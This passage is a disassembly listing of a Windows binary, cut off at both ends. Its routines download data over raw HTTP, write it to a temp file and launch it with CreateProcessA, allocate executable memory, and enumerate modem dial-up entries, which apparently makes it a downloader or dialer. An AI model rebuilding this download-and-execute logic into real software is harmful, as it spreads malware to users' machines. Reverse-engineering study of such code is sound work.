push 7FFFFFFFh
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_6001CA3
retn 8
sub_6001CD1 endp
; =============== S U B R O U T I N E =======================================
sub_6001CE6 proc near ; CODE XREF: sub_6001FD5+9E�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
xor ebx, ebx
xor eax, eax
mov ecx, 10h
loc_6001CF4: ; CODE XREF: sub_6001CE6+1F�j
mov bl, [esi]
inc esi
sub bl, 30h
jb short loc_6001D07
cmp bl, 9
ja short loc_6001D07
mul ecx
add eax, ebx
jmp short loc_6001CF4
; ---------------------------------------------------------------------------
loc_6001D07: ; CODE XREF: sub_6001CE6+14�j
; sub_6001CE6+19�j
pop esi
retn 4
sub_6001CE6 endp
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_6001D0B(LPSTR lpBuffer,DWORD uSize)
sub_6001D0B proc near ; CODE XREF: start+22A�p start+3CB�p
lpBuffer = dword ptr 4
uSize = dword ptr 8
push esi
push edi
mov esi, [esp+8+lpBuffer]
mov edi, [esp+8+uSize]
mov byte ptr [esi], 0
push esi ; lpBuffer
push edi ; nBufferLength
call ds:GetTempPathA ; GetTempPathA
cmp byte ptr [esi], 0
jnz short loc_6001D38
push edi ; uSize
push esi ; lpBuffer
call ds:GetWindowsDirectoryA ; GetWindowsDirectoryA
cmp byte ptr [esi], 0
jnz short loc_6001D38
mov dword ptr [esi], 5C3A43h
loc_6001D38: ; CODE XREF: sub_6001D0B+18�j
; sub_6001D0B+25�j
pop edi
pop esi
retn 8
sub_6001D0B endp
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_6001D3D(SIZE_T dwSize)
sub_6001D3D proc near ; CODE XREF: start+44�p
dwSize = dword ptr 4
mov eax, [esp+dwSize]
xor ebx, ebx
push 40h ; flProtect
push 1000h ; flAllocationType
push eax ; dwSize
push ebx ; lpAddress
call ds:VirtualAlloc ; VirtualAlloc
retn 4
sub_6001D3D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_6001D55(LPCSTR lpFileName,LPCVOID lpBuffer,DWORD nNumberOfBytesToWrite,int,int)
sub_6001D55 proc near ; CODE XREF: start+243�p start+3E4�p
hObject = dword ptr -8
NumberOfBytesWritten= dword ptr -4
lpFileName = dword ptr 8
lpBuffer = dword ptr 0Ch
nNumberOfBytesToWrite= dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 8
xor eax, eax
push eax ; hTemplateFile
push eax ; dwFlagsAndAttributes
push 2 ; dwCreationDisposition
push eax ; lpSecurityAttributes
push 3 ; dwShareMode
push 40000000h ; dwDesiredAccess
push [ebp+lpFileName] ; lpFileName
call ds:CreateFileA ; CreateFileA
cmp eax, 0FFFFFFFFh
jz short loc_6001DE3
mov [ebp+hObject], eax
xor ebx, ebx
mov [ebp+NumberOfBytesWritten], ebx
lea edx, [ebp+NumberOfBytesWritten]
push 0 ; lpOverlapped
push edx ; lpNumberOfBytesWritten
push [ebp+nNumberOfBytesToWrite] ; nNumberOfBytesToWrite
push [ebp+lpBuffer] ; lpBuffer
push eax ; hFile
call ds:WriteFile ; WriteFile
push [ebp+hObject] ; hObject
call ds:CloseHandle ; CloseHandle
mov eax, [ebp+arg_C]
test al, al
jz short loc_6001DDE
xor eax, eax
push eax ; hTemplateFile
push 4000000h ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push eax ; lpSecurityAttributes
push 3 ; dwShareMode
push 80000000h ; dwDesiredAccess
push [ebp+lpFileName] ; lpFileName
call ds:CreateFileA ; CreateFileA
cmp eax, 0FFFFFFFFh
jz short loc_6001DE3
mov [ebp+hObject], eax
push 1F4h ; dwMilliseconds
push [ebp+arg_10] ; int
push [ebp+lpFileName] ; int
call sub_6001DEB
push [ebp+hObject] ; hObject
call ds:CloseHandle ; CloseHandle
loc_6001DDE: ; CODE XREF: sub_6001D55+4B�j
mov eax, [ebp+NumberOfBytesWritten]
jmp short loc_6001DE5
; ---------------------------------------------------------------------------
loc_6001DE3: ; CODE XREF: sub_6001D55+20�j
; sub_6001D55+6B�j
xor eax, eax
loc_6001DE5: ; CODE XREF: sub_6001D55+8C�j
mov esp, ebp
pop ebp
retn 14h
sub_6001D55 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_6001DEB(int,int,DWORD dwMilliseconds)
sub_6001DEB proc near ; CODE XREF: start+253�p start+3F6�p ...
hObject = _PROCESS_INFORMATION ptr -458h
StartupInfo = _STARTUPINFOA ptr -448h
CommandLine = byte ptr -400h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
dwMilliseconds = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 458h
push edi
pushf
lea edi, [ebp+hObject]
mov ecx, 96h
xor eax, eax
rep stosd
popf
pop edi
mov [ebp+StartupInfo.cb], 48h
lea eax, [ebp+CommandLine]
push 100h
push [ebp+arg_0]
push eax
call sub_6001BC9
mov ebx, [ebp+arg_4]
test ebx, ebx
jz short loc_6001E4A
push 1
push offset byte_6001EA4
push eax
call sub_6001BC9
push 2F6h
push [ebp+arg_4]
push eax
call sub_6001BC9
loc_6001E4A: ; CODE XREF: sub_6001DEB+3F�j
lea eax, [ebp+StartupInfo]
lea ebx, [ebp+hObject]
lea ecx, [ebp+CommandLine]
xor edx, edx
push ebx ; lpProcessInformation
push eax ; lpStartupInfo
push edx ; lpCurrentDirectory
push edx ; lpEnvironment
push edx ; dwCreationFlags
push edx ; bInheritHandles
push edx ; lpThreadAttributes
push edx ; lpProcessAttributes
push ecx ; lpCommandLine
push edx ; lpApplicationName
call ds:CreateProcessA ; CreateProcessA
test eax, eax
jz short loc_6001E9E
mov eax, [ebp+dwMilliseconds]
test eax, eax
jz short loc_6001E86
push eax ; dwMilliseconds
push [ebp+hObject.hProcess] ; hHandle
call ds:WaitForSingleObject ; WaitForSingleObject
loc_6001E86: ; CODE XREF: sub_6001DEB+8C�j
push [ebp+hObject.hProcess] ; hObject
call ds:CloseHandle ; CloseHandle
push [ebp+hObject.hThread] ; hObject
call ds:CloseHandle ; CloseHandle
loc_6001E9E: ; CODE XREF: sub_6001DEB+85�j
mov esp, ebp
pop ebp
retn 0Ch
sub_6001DEB endp
; ---------------------------------------------------------------------------
byte_6001EA4 db 20h, 0 ; DATA XREF: sub_6001DEB+46�o
; =============== S U B R O U T I N E =======================================
sub_6001EA6 proc near ; CODE XREF: sub_6001FD5+21�p
mov eax, ds:6003198h
test eax, eax
jz short loc_6001EB5
mov eax, ds:6003194h
retn
; ---------------------------------------------------------------------------
loc_6001EB5: ; CODE XREF: sub_6001EA6+7�j
inc dword ptr ds:6003198h
mov eax, 101h
sub esp, 30h
mov ebx, ds:60031ACh
test ebx, ebx
jz short loc_6001ED1
push esp
push eax
call ebx
loc_6001ED1: ; CODE XREF: sub_6001EA6+25�j
mov ds:6003194h, eax
add esp, 30h
retn
sub_6001EA6 endp
; =============== S U B R O U T I N E =======================================
sub_6001EDA proc near ; CODE XREF: start+3B8�p start+4F0�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, 3
mov eax, [esp+arg_0]
mov ebx, [esp+arg_4]
mov edx, [esp+arg_8]
loc_6001EEB: ; CODE XREF: sub_6001EDA+43�j
push ecx
push eax
push ebx
push edx
push edx
push ebx
push eax
call sub_6001F24
test eax, eax
jz short loc_6001F01
add esp, 10h
retn 0Ch
; ---------------------------------------------------------------------------
loc_6001F01: ; CODE XREF: sub_6001EDA+1F�j
pop edx
pop ebx
pop eax
sub esp, 0Ch
push edx
push ebx
push eax
call sub_6001FD5
test eax, eax
jz short loc_6001F19
add esp, 10h
retn 0Ch
; ---------------------------------------------------------------------------
loc_6001F19: ; CODE XREF: sub_6001EDA+37�j
pop edx
pop ebx
pop eax
pop ecx
loop loc_6001EEB
xor eax, eax
retn 0Ch
sub_6001EDA endp
; =============== S U B R O U T I N E =======================================
sub_6001F24 proc near ; CODE XREF: sub_6001EDA+18�p
mov eax, ds:600319Ch
test eax, eax
jnz short loc_6001F30
retn 0Ch
; ---------------------------------------------------------------------------
loc_6001F30: ; CODE XREF: sub_6001F24+7�j
push ebp
mov ebp, esp
sub esp, 18h
xor eax, eax
mov [ebp-18h], eax
push eax
push eax
push eax
push 4
push offset byte_6001FD3
call dword ptr ds:600319Ch
test eax, eax
jz short loc_6001FCA
mov [ebp-14h], eax
xor eax, eax
push eax
push 84000100h
push eax
push eax
push dword ptr [ebp+8]
push dword ptr [ebp-14h]
call dword ptr ds:60031A8h
test eax, eax
jz short loc_6001FC1
mov [ebp-10h], eax
mov eax, [ebp+0Ch]
mov [ebp-0Ch], eax
mov eax, [ebp+10h]
mov [ebp-8], eax
test eax, eax
jz short loc_6001FB8
loc_6001F82: ; CODE XREF: sub_6001F24+89�j
xor eax, eax
mov [ebp-4], eax
lea eax, [ebp-4]
push eax
push dword ptr [ebp-8]
push dword ptr [ebp-0Ch]
push dword ptr [ebp-10h]
call dword ptr ds:60031A4h
test eax, eax
jz short loc_6001FB8
mov eax, [ebp-4]
test eax, eax
jz short loc_6001FAF
add [ebp-0Ch], eax
sub [ebp-8], eax
jle short loc_6001FB8
jmp short loc_6001F82
; ---------------------------------------------------------------------------
loc_6001FAF: ; CODE XREF: sub_6001F24+7F�j
mov eax, [ebp+10h]
sub eax, [ebp-8]
mov [ebp-18h], eax
loc_6001FB8: ; CODE XREF: sub_6001F24+5C�j
; sub_6001F24+78�j ...
push dword ptr [ebp-10h]
call dword ptr ds:60031A0h
loc_6001FC1: ; CODE XREF: sub_6001F24+49�j
push dword ptr [ebp-14h]
call dword ptr ds:60031A0h
loc_6001FCA: ; CODE XREF: sub_6001F24+2C�j
mov eax, [ebp-18h]
mov esp, ebp
pop ebp
retn 0Ch
sub_6001F24 endp
; ---------------------------------------------------------------------------
byte_6001FD3 db 6Dh ; DATA XREF: sub_6001F24+1F�o
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_6001FD5 proc near ; CODE XREF: sub_6001EDA+30�p
var_330 = word ptr -330h
var_32E = word ptr -32Eh
var_32C = dword ptr -32Ch
var_328 = dword ptr -328h
var_324 = dword ptr -324h
var_320 = byte ptr -320h
var_220 = byte ptr -220h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 0Ch
arg_4 = dword ptr 10h
arg_8 = dword ptr 14h
push esi
push ebp
mov ebp, esp
sub esp, 330h
mov [ebp+var_330], 2
xor eax, eax
mov [ebp+var_328], eax
mov [ebp+var_324], eax
call sub_6001EA6
test eax, eax
jnz loc_60021DE
lea eax, [ebp+var_320]
push 0FFh
push [ebp+arg_0]
push eax
call sub_6001BC9
lea eax, [ebp+var_320]
push 2Fh
push eax
call sub_6001C39
test eax, eax
jz loc_60021DE
mov bl, [eax+1]
cmp bl, 2Fh
jnz loc_60021DE
add eax, 2
mov [ebp+var_18], eax
push 2Fh
push eax
call sub_6001C39
test eax, eax
jz loc_60021DE
mov [ebp+var_1C], eax
mov byte ptr [eax], 0
push 3Ah
push [ebp+var_18]
call sub_6001C39
test eax, eax
jz short loc_600209A
mov esi, eax
mov byte ptr [esi], 0
inc eax
push eax
call sub_6001CE6
bswap eax
shr eax, 10h
mov [ebp+var_32E], ax
push [ebp+var_18]
call dword ptr ds:60031C4h
test eax, eax
jz loc_60021DE
mov byte ptr [esi], 3Ah
jmp short loc_60020B4
; ---------------------------------------------------------------------------
loc_600209A: ; CODE XREF: sub_6001FD5+95�j
push [ebp+var_18]
call dword ptr ds:60031C4h
test eax, eax
jz loc_60021DE
mov [ebp+var_32E], 5000h
loc_60020B4: ; CODE XREF: sub_6001FD5+C3�j
mov [ebp+var_32C], eax
lea eax, [ebp+var_220]
push offset byte_60021E7
push eax
call sub_6001BED
mov ebx, [ebp+var_1C]
inc ebx
push ebx
push eax
call sub_6001BED
push offset aHttp1_1Host ; " HTTP/1.1\r\nHost: "
push eax
call sub_6001BED
push [ebp+var_18]
push eax
call sub_6001BED
push offset aUserAgentRConn ; "\r\nUser-Agent: r\r\nConnection: close\r\n\r\n"
push eax
call sub_6001BED
push 6
push 1
push 2
call dword ptr ds:60031B0h
cmp eax, 0FFFFFFFFh
jz loc_60021DE
mov [ebp+var_20], eax
lea ebx, [ebp+var_330]
push 10h
push ebx
push eax
call dword ptr ds:60031B4h
test eax, eax
jnz loc_60021D5
lea esi, [ebp+var_220]
push esi
call sub_6001C23
push eax
xor ebx, ebx
push ebx
push eax
push esi
push [ebp+var_20]
call dword ptr ds:60031B8h
pop ebx
cmp eax, ebx
jnz loc_60021D5
mov eax, [ebp+arg_8]
mov [ebp+var_14], eax
test eax, eax
jz short loc_60021D5
mov esi, [ebp+arg_4]
loc_6002162: ; CODE XREF: sub_6001FD5+1AB�j
xor ebx, ebx
push ebx
push [ebp+var_14]
push esi
push [ebp+var_20]
call dword ptr ds:60031BCh
cmp eax, 0
jl short loc_60021D5
jz short loc_6002182
add esi, eax
sub [ebp+var_14], eax
jle short loc_60021D5
jmp short loc_6002162
; ---------------------------------------------------------------------------
loc_6002182: ; CODE XREF: sub_6001FD5+1A2�j
mov ecx, [ebp+arg_8]
sub ecx, [ebp+var_14]
test ecx, ecx
jz short loc_60021D5
sub ecx, 3
mov esi, [ebp+arg_4]
loc_6002192: ; CODE XREF: sub_6001FD5+1D9�j
cmp dword ptr [esi], 0A0D0A0Dh
jnz short loc_60021A0
dec ecx
add esi, 4
jmp short loc_60021B2
; ---------------------------------------------------------------------------
loc_60021A0: ; CODE XREF: sub_6001FD5+1C3�j
cmp word ptr [esi], 0A0Ah
jnz short loc_60021AD
inc ecx
add esi, 2
jmp short loc_60021B2
; ---------------------------------------------------------------------------
loc_60021AD: ; CODE XREF: sub_6001FD5+1D0�j
inc esi
loop loc_6002192
jmp short loc_60021C4
; ---------------------------------------------------------------------------
loc_60021B2: ; CODE XREF: sub_6001FD5+1C9�j
; sub_6001FD5+1D6�j
push edi
pushf
cld
mov eax, [ebp+arg_8]
sub eax, ecx
mov [ebp+var_14], eax
mov edi, [ebp+arg_4]
rep movsb
popf
pop edi
loc_60021C4: ; CODE XREF: sub_6001FD5+1DB�j
push [ebp+var_20]
call dword ptr ds:60031C0h
mov eax, [ebp+arg_8]
sub eax, [ebp+var_14]
jmp short loc_60021E0
; ---------------------------------------------------------------------------
loc_60021D5: ; CODE XREF: sub_6001FD5+156�j
; sub_6001FD5+17A�j ...
push [ebp+var_20]
call dword ptr ds:60031C0h
loc_60021DE: ; CODE XREF: sub_6001FD5+28�j
; sub_6001FD5+55�j ...
xor eax, eax
loc_60021E0: ; CODE XREF: sub_6001FD5+1FE�j
mov esp, ebp
pop ebp
pop esi
retn 0Ch
sub_6001FD5 endp
; ---------------------------------------------------------------------------
byte_60021E7 db 47h ; DATA XREF: sub_6001FD5+EB�o
dd 2F205445h
db 0
aHttp1_1Host db ' HTTP/1.1',0Dh,0Ah ; DATA XREF: sub_6001FD5+101�o
db 'Host: ',0
aUserAgentRConn db 0Dh,0Ah ; DATA XREF: sub_6001FD5+115�o
db 'User-Agent: r',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_6002226 proc near ; CODE XREF: sub_60024DA+2B�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
cmp dword ptr ds:60031C8h, 0
jz short loc_600227B
cmp [ebp+arg_4], 41Ch
jl short loc_600227B
mov ebx, [ebp+arg_0]
mov eax, [ebp+arg_4]
mov [ebx], eax
push [ebp+arg_0]
push 10004h
push 0
call dword ptr ds:60031C8h
test eax, eax
jnz short loc_600227B
mov ebx, [ebp+arg_0]
mov ecx, [ebx+0Ch]
test ecx, ecx
jz short loc_600227B
mov eax, [ebx+18h]
add ebx, [ebx+14h]
loc_600226A: ; CODE XREF: sub_6002226+4B�j
cmp eax, [ebx]
jz short loc_6002275
add ebx, 44h
loop loc_600226A
jmp short loc_600227B
; ---------------------------------------------------------------------------
loc_6002275: ; CODE XREF: sub_6002226+46�j
cmp byte ptr [ebx+38h], 1
jz short loc_600227F
loc_600227B: ; CODE XREF: sub_6002226+D�j
; sub_6002226+16�j ...
xor eax, eax
jmp short loc_6002282
; ---------------------------------------------------------------------------
loc_600227F: ; CODE XREF: sub_6002226+53�j
xor eax, eax
inc eax
loc_6002282: ; CODE XREF: sub_6002226+57�j
add esp, 14h
pop ebp
retn 8
sub_6002226 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_6002289 proc near ; CODE XREF: sub_60024DA-39�p
; sub_60024DA-27�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
cmp dword ptr ds:60031C8h, 0
jz short loc_600230B
cmp [ebp+arg_4], 41Ch
jl short loc_600230B
mov ebx, [ebp+arg_0]
mov eax, [ebp+arg_4]
mov [ebx], eax
push [ebp+arg_0]
push 10004h
push 0
call dword ptr ds:60031C8h
test eax, eax
jnz short loc_600230B
mov ebx, [ebp+arg_0]
mov ecx, [ebx+0Ch]
test ecx, ecx
jz short loc_600230B
mov eax, [ebx+18h]
add ebx, [ebx+14h]
loc_60022CD: ; CODE XREF: sub_6002289+4B�j
cmp eax, [ebx]
jz short loc_60022D8
add ebx, 44h
loop loc_60022CD
jmp short loc_600230B
; ---------------------------------------------------------------------------
loc_60022D8: ; CODE XREF: sub_6002289+46�j
add ebx, 1Ch
cmp [ebp+arg_8], 1
jz short loc_60022E4
add ebx, 8
loc_60022E4: ; CODE XREF: sub_6002289+56�j
cmp dword ptr [ebx], 0
jle short loc_600230B
cmp dword ptr [ebx+4], 0
jle short loc_600230B
push dword ptr [ebx]
mov edx, [ebp+arg_0]
add edx, [ebx+4]
push dword ptr [ebx]
push edx
push [ebp+arg_0]
call sub_6001BAE
pop ebx
add ebx, [ebp+arg_0]
mov byte ptr [ebx], 0
jmp short loc_6002315
; ---------------------------------------------------------------------------
loc_600230B: ; CODE XREF: sub_6002289+D�j
; sub_6002289+16�j ...
mov ebx, [ebp+arg_0]
mov byte ptr [ebx], 0
xor eax, eax
jmp short loc_6002318
; ---------------------------------------------------------------------------
loc_6002315: ; CODE XREF: sub_6002289+80�j
xor eax, eax
inc eax
loc_6002318: ; CODE XREF: sub_6002289+8A�j
add esp, 14h
pop ebp
retn 0Ch
sub_6002289 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_600231F proc near ; CODE XREF: sub_600256F+15�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
cmp dword ptr ds:60031E4h, 0
jz short loc_6002341
cmp dword ptr ds:60031CCh, 0
jz short loc_6002341
mov eax, [ebp+arg_4]
cmp eax, 3D8h
jge short loc_6002348
loc_6002341: ; CODE XREF: sub_600231F+D�j
; sub_600231F+16�j
xor eax, eax
jmp loc_6002477
; ---------------------------------------------------------------------------
loc_6002348: ; CODE XREF: sub_600231F+20�j
xor eax, eax
mov edx, [ebp+arg_0]
mov [edx], eax
mov eax, [ebp+arg_4]
sub eax, 23Ch
xor edx, edx
div dword_600247E
mov [ebp+var_4], eax
mul dword_600247E
mov [ebp+var_8], eax
mov ecx, [ebp+var_4]
mov ebx, [ebp+arg_0]
add ebx, 23Ch
mov eax, 19Ch
loc_600237C: ; CODE XREF: sub_600231F+61�j
mov [ebx], eax
add ebx, eax
loop loc_600237C
mov ebx, [ebp+arg_0]
add ebx, 23Ch
lea eax, [ebp+var_8]
lea edx, [ebp+var_C]
push edx
push eax
push ebx
call dword ptr ds:60031E4h
test eax, eax
jz short loc_60023A5
xor eax, eax
jmp loc_6002477
; ---------------------------------------------------------------------------
loc_60023A5: ; CODE XREF: sub_600231F+7D�j
mov ebx, [ebp+arg_0]
add ebx, 23Ch
mov ecx, [ebp+var_C]
test ecx, ecx
jz short loc_60023BA
cmp ecx, [ebp+var_4]
jle short loc_60023C1
loc_60023BA: ; CODE XREF: sub_600231F+94�j
xor eax, eax
jmp loc_6002477
; ---------------------------------------------------------------------------
loc_60023C1: ; CODE XREF: sub_600231F+99�j
; sub_600231F+C8�j ...
push ebx
push ecx
mov eax, [ebp+arg_0]
add eax, 19Ch
mov dword ptr [eax], 0A0h
push eax
push dword ptr [ebx+4]
call dword ptr ds:60031CCh
test eax, eax
jz short loc_60023EE
loc_60023DF: ; CODE XREF: sub_600231F+EE�j
pop ecx
pop ebx
add ebx, 19Ch
loop loc_60023C1
jmp loc_6002472
; ---------------------------------------------------------------------------
loc_60023EE: ; CODE XREF: sub_600231F+BE�j
mov edx, [ebp+arg_0]
add edx, 19Ch
push edx
add edx, 0Ch
push 5
push offset aModem ; "modem"
push edx
call sub_6001C7D
test eax, eax
jz short loc_600240F
pop edx
jmp short loc_60023DF
; ---------------------------------------------------------------------------
loc_600240F: ; CODE XREF: sub_600231F+EB�j
pop edx
pop ecx
pop ebx
push edx
push ecx
push ebx
mov ecx, [ebp+arg_0]
add ecx, 105h
mov eax, [ebx+4]
mov [ecx], eax
add ebx, 8
push 101h
push ebx
push [ebp+arg_0]
call sub_6001BAE
pop ebx
pop ecx
pop edx
push edx
push ecx
push ebx
mov ecx, [ebp+arg_0]
add ecx, 101h
mov eax, [edx+4]
mov [ecx], eax
add edx, 0Ch
add ecx, 8
push 93h
push edx
push ecx
call sub_6001BAE
pop ebx
pop ecx
pop edx
cmp word ptr [edx+4], 2000h
jz short loc_6002472
add ebx, 19Ch
dec ecx
jnz loc_60023C1
loc_6002472: ; CODE XREF: sub_600231F+CA�j
; sub_600231F+144�j
mov ebx, [ebp+arg_0]
mov eax, [ebx]
loc_6002477: ; CODE XREF: sub_600231F+24�j
; sub_600231F+81�j ...
add esp, 10h
pop ebp
retn 8
sub_600231F endp
; ---------------------------------------------------------------------------
dword_600247E dd 19Ch ; DATA XREF: sub_600231F+3A�r
; sub_600231F+43�r
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_60024DA
loc_6002482: ; CODE XREF: sub_60024DA-1F�j
; sub_60024DA-17�j
xor eax, eax
popf
pop edi
pop esi
add esp, 88h
pop ebp
retn 14h
; ---------------------------------------------------------------------------
loc_6002491: ; CODE XREF: sub_60024DA+39�j
; sub_60024DA+41�j
push ecx
cmp al, 69h
jz short loc_60024A8
push 1
push [ebp+arg_4]
push [ebp+arg_0]
call sub_6002289
jmp short loc_60024B8
; ---------------------------------------------------------------------------
loc_60024A8: ; CODE XREF: sub_60024DA-46�j
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_6002289
loc_60024B8: ; CODE XREF: sub_60024DA-34�j
pop ecx
test eax, eax
jz short loc_6002482
mov ebx, [ebp+arg_0]
cmp byte ptr [ebx], 0
jz short loc_6002482
push esi
mov esi, [ebp+arg_0]
loc_60024C9: ; CODE XREF: sub_60024DA-B�j
lodsb
cmp al, 0
jz short loc_60024D1
stosb
loop loc_60024C9
loc_60024D1: ; CODE XREF: sub_60024DA-E�j
pop esi
test ecx, ecx
jnz short loc_60024D8
dec ecx
dec esi
loc_60024D8: ; CODE XREF: sub_60024DA-6�j
jmp short loc_60024F5
; END OF FUNCTION CHUNK FOR sub_60024DA
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_60024DA proc near ; CODE XREF: start+1B5�p start+311�p
var_84 = byte ptr -84h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
; FUNCTION CHUNK AT 06002482 SIZE 00000058 BYTES
push ebp
mov ebp, esp
sub esp, 88h
push esi
push edi
pushf
cld
lea edi, [ebp+var_84]
mov esi, [ebp+arg_8]
mov ecx, 80h
loc_60024F5: ; CODE XREF: sub_60024DA:loc_60024D8�j
; sub_60024DA+33�j ...
lodsb
cmp al, 0
jz short loc_6002524
cmp al, 78h
jnz short loc_6002511
push ecx
push [ebp+arg_4]
push [ebp+arg_0]
call sub_6002226
pop ecx
test eax, eax
jz short loc_60024F5
mov al, 50h
loc_6002511: ; CODE XREF: sub_60024DA+22�j
cmp al, 69h
jz loc_6002491
cmp al, 64h
jz loc_6002491
stosb
loop loc_60024F5
loc_6002524: ; CODE XREF: sub_60024DA+1E�j
xor al, al
stosb
popf
pop edi
pop esi
lea eax, [ebp+var_84]
cmp byte ptr [eax], 73h
jnz short loc_600253F
inc eax
push eax
push 0
call sub_60029B0
pop eax
loc_600253F: ; CODE XREF: sub_60024DA+59�j
push [ebp+arg_10]
push [ebp+arg_C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_600256F
lea ebx, [ebp+var_84]
cmp byte ptr [ebx], 73h
jnz short loc_6002565
push eax
push 1
call sub_60029B0
pop eax
loc_6002565: ; CODE XREF: sub_60024DA+80�j
add esp, 88h
pop ebp
retn 14h
sub_60024DA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_600256F proc near ; CODE XREF: sub_60024DA+72�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 14h
cmp dword ptr ds:60031E8h, 0
jz short loc_60025F0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_600231F
test eax, eax
jz short loc_60025F0
push 101h
push [ebp+arg_0]
push 6003210h
call sub_6001BAE
cmp byte ptr ds:6003210h, 0
jz short loc_60025B7
push offset byte_60026F5
push 6003210h
call sub_6001C69
loc_60025B7: ; CODE XREF: sub_600256F+37�j
mov ebx, [ebp+arg_0]
add ebx, 105h
push ebx
push dword ptr [ebx]
call dword ptr ds:60031E8h
pop ebx
mov ecx, 64h
loc_60025CF: ; CODE XREF: sub_600256F+7D�j
push ecx
push ebx
push 64h ; dwMilliseconds
call ds:Sleep ; Sleep
pop ebx
push ebx
push [ebp+arg_0]
push dword ptr [ebx]
call dword ptr ds:60031CCh
test eax, eax
jnz short loc_60025EE
pop ebx
pop ecx
loop loc_60025CF
loc_60025EE: ; CODE XREF: sub_600256F+79�j
pop ebx
pop ecx
loc_60025F0: ; CODE XREF: sub_600256F+D�j
; sub_600256F+1C�j
cmp dword ptr ds:60031D8h, 0
jz short loc_6002674
cmp [ebp+arg_4], 7D0h
jl short loc_6002674
mov [ebp+var_4], 0
mov eax, [ebp+arg_4]
sub eax, 6E8h
mov [ebp+var_8], eax
lea eax, [ebp+var_8]
lea edx, [ebp+var_4]
mov ebx, [ebp+arg_0]
mov dword ptr [ebx], 98h
push edx
push eax
push ebx
call dword ptr ds:60031D8h
test eax, eax
jnz short loc_6002674
mov ecx, [ebp+var_4]
mov ebx, [ebp+arg_0]
add ebx, [ebp+var_8]
mov [ebp+var_C], ebx
mov ebx, [ebp+arg_4]
sub ebx, [ebp+var_8]
mov [ebp+var_10], ebx
mov ebx, [ebp+arg_0]
loc_6002648: ; CODE XREF: sub_600256F+103�j
push ecx
push ebx
lea eax, [ebx+4]
lea edx, [ebx+15h]
push edx
push eax
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+var_10]
push [ebp+var_C]
call sub_6002681
test eax, eax
jnz short loc_6002678
pop ebx
add ebx, 98h
pop ecx
loop loc_6002648
loc_6002674: ; CODE XREF: sub_600256F+88�j
; sub_600256F+91�j ...
xor eax, eax
jmp short loc_600267A
; ---------------------------------------------------------------------------
loc_6002678: ; CODE XREF: sub_600256F+F9�j
pop ecx
pop ecx
loc_600267A: ; CODE XREF: sub_600256F+107�j
add esp, 14h
pop ebp
retn 14h
sub_600256F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_6002681 proc near ; CODE XREF: sub_600256F+F2�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 14h
cmp byte ptr ds:6003210h, 0
jnz short loc_6002705
cmp dword ptr ds:60031DCh, 0
jz short loc_60026F8
lea eax, [ebp+var_4]
mov edx, [ebp+arg_4]
mov [eax], edx
mov edx, [ebp+arg_0]
mov dword ptr [edx], 108h
lea ebx, [ebp+var_8]
push ebx
push eax
push edx
push 0
push 0
call dword ptr ds:60031DCh
test eax, eax
jnz short loc_60026F8
cmp [ebp+var_8], 0
jz short loc_60026F8
mov ebx, [ebp+arg_0]
add ebx, 4
push ebx
push 6003210h
call sub_6001BED
cmp byte ptr ds:6003210h, 0
jz short loc_60026F8
push offset byte_60026F5
push 6003210h
call sub_6001C69
jmp short loc_6002705
; ---------------------------------------------------------------------------
byte_60026F5 db 20h, 31h, 0 ; DATA XREF: sub_600256F+39�o
; sub_6002681+63�o
; ---------------------------------------------------------------------------
loc_60026F8: ; CODE XREF: sub_6002681+16�j
; sub_6002681+41�j ...
push [ebp+arg_8]
push 6003210h
call sub_6001BED
loc_6002705: ; CODE XREF: sub_6002681+D�j
; sub_6002681+72�j
cmp dword ptr ds:60031E0h, 0
jz loc_60028D5
cmp dword ptr ds:60031CCh, 0
jz loc_60028D5
